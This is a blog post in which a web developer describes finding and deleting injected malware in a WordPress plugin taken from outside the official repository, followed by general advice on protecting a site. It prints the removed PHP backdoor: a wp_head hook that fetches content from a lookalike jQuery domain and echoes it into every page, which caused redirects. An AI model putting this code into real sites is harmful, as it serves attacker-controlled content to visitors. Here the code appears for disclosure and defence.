Recently I added a plug-in outside of the WordPress repository. To my horror, one of the files had a malware code inserted into the the “head” tag. The bad guys are so cleaver that they made their code to run randomly so it will not be detected by the web developer as soon as they install these bad plugins. So how do you know you have problems in your installed scripts? How do you go around fixing them? The answer to the first is that you probably won’t know until a visitor to your site or yourself come across it. But if the bad guys are into stealing information such as credit card data, you may be out of luck.

I am going specially target one of the malware injection which can be detected by anyone; the automated redirection. The automated redirection is used to direct your visitor to whatever the website the guys want promote. Most of the time they are either directed to survey sites, illegal websites such drug trafficking and/or pornographic sites. Regardless of your moral values, the major issue here is these scripts will not provide you with an option to disable and/or modify their behaviors. That’s where programmers like us come into save your site!

I end up with redirection to unknown website once in a while I try to view my web site. So, I dig around and found that a function called wp_head() in one of the PHP files are used as a backdoor to inject a questionable code in UberMenu plug-in. I used the Editor in WP administration page to delete the function completely in TipTour.class.php file (file with this function). The code I removed was;

function wp__head() {
 if(function_exists('curl_init'))
 {
  $ch = curl_init();  
  curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
  curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
  curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
  curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,"10"); 
  $data = curl_exec($ch);  
  curl_close($ch); 
  echo "$data";
 }
}
add_action('wp_head', 'wp__head');

Protect yourself

If you find something wrong with your plug-in or you find an odd behavior, contact the developers as soon as possible. If you do not know who to contact for help, try using one of the free web site scanners, which also can come in as a plug-in, website or both. In addition, if there is an option to download a any add-on to your servers directly from either the CMS developers or from the add-on/plug-in developer, please use their resources. You should also scan any externally loaded files to your web server through a virus scan before installing on your http/www folders. After installing anything, check the folder and file permissions using FTP or cPanel (or such programs) for 777 permissions. If you find any permissions has been changed to 777, immediately change the permissions manually (USE CAUTION: It may break your website!). Go to SQL/MySQL administration panel and check for injection scripts and if you find them copy the file first and then delete them. Report such injections to the developers with the information on the copies injected file.

Always remember this is not limited to a single CMS. In fact, any website even without the use of a CMS could end up becoming a victim. However, since CMS programs are very popular among web developer and used by even government agencies such as whitehouse.gov and ucalgary.ca (Drupal), bad hackers are increasingly targeting CMS based websites.